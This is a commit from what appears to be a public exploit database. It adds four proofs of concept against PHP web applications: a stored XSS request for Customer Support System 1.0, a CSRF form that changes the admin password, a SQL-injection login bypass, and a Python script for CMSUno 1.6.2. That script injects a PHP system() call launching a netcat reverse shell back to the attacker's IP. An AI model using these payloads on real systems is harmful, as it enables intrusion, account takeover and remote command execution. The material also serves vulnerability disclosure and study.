DB: 2020-11-12

4 changes to exploits/shellcodes Customer Support System 1.0 - 'description' Stored XSS in The Admin Panel Customer Support System 1.0 - Cross-Site Request Forgery Customer Support System 1.0 - 'username' Authentication Bypass CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
2020-11-12 05:01:58 +00:00 · 2020-11-12 05:01:58 +00:00 · e9fc264b77
commit e9fc264b77
parent 3774170267
5 changed files with 184 additions and 0 deletions
--- a/exploits/php/webapps/49028.txt
+++ b/exploits/php/webapps/49028.txt
@ -0,0 +1,44 @@
+# Exploit Title: Customer Support System 1.0  - 'description' Stored XSS in The Admin Panel
+# Date: 2020-11-11
+# Exploit Author: Ahmed Abbas
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+
+
+Stored XSS Reproduction Steps:
+1. Navigate to http://TARGET/customer_support/index.php?page=department_list
+2. Click on new Department
+3. Add the XSS payload into the "description" parameter value
+4. Browse to the post to trigger the XSS payload
+
+# POC
+
+POST /customer_support/ajax.php?action=save_department HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------196034062430192961002574272606
+Content-Length: 445
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/customer_support/index.php?page=department_list
+Cookie: PHPSESSID=6dbp44u1fs8f0ndfqutpn3lbuq
+
+-----------------------------196034062430192961002574272606
+Content-Disposition: form-data; name="id"
+
+4
+-----------------------------196034062430192961002574272606
+Content-Disposition: form-data; name="name"
+
+Stored xss
+-----------------------------196034062430192961002574272606
+Content-Disposition: form-data; name="description"
+
+<script>alert("STORED XSS")</script>
+-----------------------------196034062430192961002574272606--
--- a/exploits/php/webapps/49029.txt
+++ b/exploits/php/webapps/49029.txt
@ -0,0 +1,30 @@
+# Exploit Title: Customer Support System 1.0  - Cross-Site Request Forgery (Admin Account Takeover)
+# Date: 2020-11-11
+# Exploit Author: Ahmed Abbas
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+
+
+# Description :  Admin Account Takeover 
+# Vulnerability Details
+    [+] The username and password parameters can be forged to force the password change of admin user account.
+
+# POC - CSRF HTML
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost/customer_support/ajax.php?action=save_user" method="POST">
+      <input type="hidden" name="id" value="1" />
+      <input type="hidden" name="table" value="users" />
+      <input type="hidden" name="firstname" value="Administrator" />
+      <input type="hidden" name="middlename" value="" />
+      <input type="hidden" name="lastname" value="" />
+      <input type="hidden" name="username" value="admin" />
+      <input type="hidden" name="password" value="newpass" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
--- a/exploits/php/webapps/49030.txt
+++ b/exploits/php/webapps/49030.txt
@ -0,0 +1,30 @@
+# Title: Customer Support System 1.0 - 'username' Authentication Bypass
+# Date: 2020-11-11
+# Exploit Author: Ahmed Abbas
+# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+
+
+# Description :  Authentication Bypass
+# Vulnerability Details:
+[+] A SQL injection vulnerability in Customer Support System 1.0  allows remote unauthenticated attackers to bypass the authentication process via username and password parameters.
+ 
+
+# Malicious POST Request to https://TARGET
+POST /customer_support/ajax.php?action=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 62
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/customer_support/login.php
+Cookie: PHPSESSID=gbattc1r1riap25kr5k2k1ureo
+
+username=' or 1=1 or ''='&password=password&type=1
--- a/exploits/php/webapps/49031.txt
+++ b/exploits/php/webapps/49031.txt
@ -0,0 +1,76 @@
+# Exploit Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020.09.30
+# Exploit Author: Fatih Çelik
+# Vendor Homepage: https://github.com/boiteasite/cmsuno/
+# Software Link: https://github.com/boiteasite/cmsuno/
+# Blog: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
+# Version: 1.6.2
+# Tested on: Kali Linux 2020.2
+# CVE : N/A
+
+import requests
+from bs4 import BeautifulSoup
+import lxml
+import json
+from time import sleep
+
+username = input("username: ")
+password = input("password: ")
+root_url = input("Root URL: http://192.168.1.9/cmsuno --> ")
+listener_ip = input("Your ip: ")
+listener_port = input("Your port for reverse shell: ")
+
+login_url = root_url + "/uno.php"
+vulnerable_url = root_url + "/uno/central.php"
+
+session = requests.Session()
+request = session.get(login_url)
+
+# Get the unox value
+soup = BeautifulSoup(request.text,"lxml")
+unox = soup.find("input",{'name':'unox'})['value']
+
+# Login 
+
+body = {"unox":unox,"user":username,"pass":password}
+session.post(login_url, data=body)
+
+# Get the second unox value
+
+request = session.get(login_url)
+text = request.text
+soup = BeautifulSoup(text,"lxml")
+script = soup.findAll('script')[1].string
+data = script.split("Unox='")[1]
+unox = data.split("',")[0]
+
+# Exploit
+
+header = {
+"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
+"Accept":"*/",
+"Accept-Encoding": "gzip, deflate",
+"X-Requested-With": "XMLHttpRequest",
+"Origin": login_url,
+"Referer": login_url
+}
+
+payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip,listener_port)
+body = 'action=sauvePass&unox={}&user0={}&pass0={}&user={}&pass=654321&lang=en'.format(unox,username,password,payload)
+session.post(vulnerable_url, data=(json.dumps(body)).replace("\\","")[1:-1],headers=header)
+
+# Login to trigger password.php
+
+# Get the unox value
+session1 = requests.Session()
+request1 = session1.get(login_url)
+soup = BeautifulSoup(request1.text,"lxml")
+unox = soup.find("input",{'name':'unox'})['value']
+
+
+# Login
+sleep(3)
+body = {"unox":unox,"user":username,"pass":password}
+session1.post(login_url, data=body)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -40845,6 +40845,10 @@ id,file,description,date,author,type,platform,port
 49025,exploits/php/webapps/49025.py,"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload",2020-11-10,"Fortunato Lodari",webapps,php,
 49026,exploits/php/webapps/49026.txt,"ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting",2020-11-10,"Joe Helle",webapps,php,
 49027,exploits/php/webapps/49027.txt,"Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection",2020-11-10,"Mufaddal Masalawala",webapps,php,
+49028,exploits/php/webapps/49028.txt,"Customer Support System 1.0  - 'description' Stored XSS in The Admin Panel",2020-11-11,"Ahmed Abbas",webapps,php,
+49029,exploits/php/webapps/49029.txt,"Customer Support System 1.0 - Cross-Site Request Forgery",2020-11-11,"Ahmed Abbas",webapps,php,
+49030,exploits/php/webapps/49030.txt,"Customer Support System 1.0 - 'username' Authentication Bypass",2020-11-11,"Ahmed Abbas",webapps,php,
+49031,exploits/php/webapps/49031.txt,"CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)",2020-11-11,"Fatih Çelik",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,